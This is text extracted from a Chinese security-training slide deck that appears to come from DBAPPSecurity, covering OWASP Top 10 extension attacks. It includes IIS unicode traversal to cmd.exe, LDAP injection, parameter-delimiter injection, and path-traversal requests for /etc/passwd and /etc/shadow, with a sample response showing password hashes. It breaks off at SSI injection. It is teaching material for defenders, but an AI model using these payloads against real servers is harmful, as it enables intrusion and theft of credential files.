攻防技术汇总部分.pptVIP

杭州安恒信息技术有限公司 DBAPPSecurity * 杭州安恒信息技术有限公司 DBAPPSecurity * 杭州安恒信息技术有限公司 DBAPPSecurity * 杭州安恒信息技术有限公司 DBAPPSecurity * 杭州安恒信息技术有限公司 DBAPPSecurity * 杭州安恒信息技术有限公司 DBAPPSecurity * 杭州安恒信息技术有限公司 DBAPPSecurity * 杭州安恒信息技术有限公司 DBAPPSecurity * OWASP TOP 10扩展之双解码漏洞 IIS unicode漏洞 8/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir tomcat utf8 unicode漏洞 OWASP TOP 10扩展之强制浏览 强制浏览允许用户枚举要访问的资源。 案例1: /users/calendar.php/user1漏洞利用: /users/calendar.php/user6 OWASP TOP 10扩展之路径泄露 路径泄露漏洞可以利用特殊构造的函数来显示WEB路径等。 案例1: /index.php?page=about 漏洞利用: /index.php?page[]=about 案例2: javascript:void(document.cookie=PHPSESSID=); 出错信息: OWASP TOP 10扩展之LDAP注入 LDAP注入漏洞LDAP是轻量目录访问协议，它是基于X.500标准的开放式标准协议。当一个Web应用程序没有正确消除用户提供的输入信息，是很有可能被攻击者改变LDAP语句的设置 案例1: input type=text size=20 name=userNameInsert the username/input 1. ldap查询 String ldapSearchQuery = (cn= + $userName + ); System.out.println(ldapSearchQuery); 2. 漏洞利用 a)输入userName=* 返回所有的ldap数据 b)获取某用户的密码jonys) (| (password = * ) ) OWASP TOP 10扩展之参数分隔符 黑客利用参数分隔符插入恶意信息 案例1: 1. mem.php内容 ? Josejose@|admin| Alicealice@|normal| ? 2. 提交漏洞 Username: Alice Password:Email: alice@ |admin| 3.漏洞利用结果 Alicealice@|admin|normal| OWASP TOP 10扩展之路径跳跃 黑客利用漏洞来跳出WEB的路径读取服务器上的任意文件。 案例1: http://some_.br/get-files.jsp?file=report.pdf http://some_.br/get.php?home=aaa.html http://some_.br/some.asp?page=index.html 漏洞利用: http://some_.br/get-files?file=/etc/passwd http://some_.br/get-files?file=../../../../../..//etc/passwd OWASP TOP 10扩展之路径跳跃 案例2: ?php $template = blue.php; if ( is_set( $_COOKIE[TEMPLATE] ) ) $template = $_COOKIE[TEMPLATE]; include ( /home/users/phpguru/templates/ . $template ); ? 1. 漏洞利用 GET /vulnerable.php HTTP/1.0 Cookie: TEMPLATE=../../../../../../../../../etc/shadow 2. 漏洞利用结果 HTTP/1.0 200 OK Content-Type: text/html Server: Apache root:fi3sED95ibqR6:0:1:System Operator:/:/bin/ksh daemon:*:1:1::/tmp: phpguru:f8fk3j1OIf31.:182:100:Developer:/home/users/phpguru/:/bin/csh OWASP TOP 10扩展之SSI注入 将内容发送到浏览器之前，可以使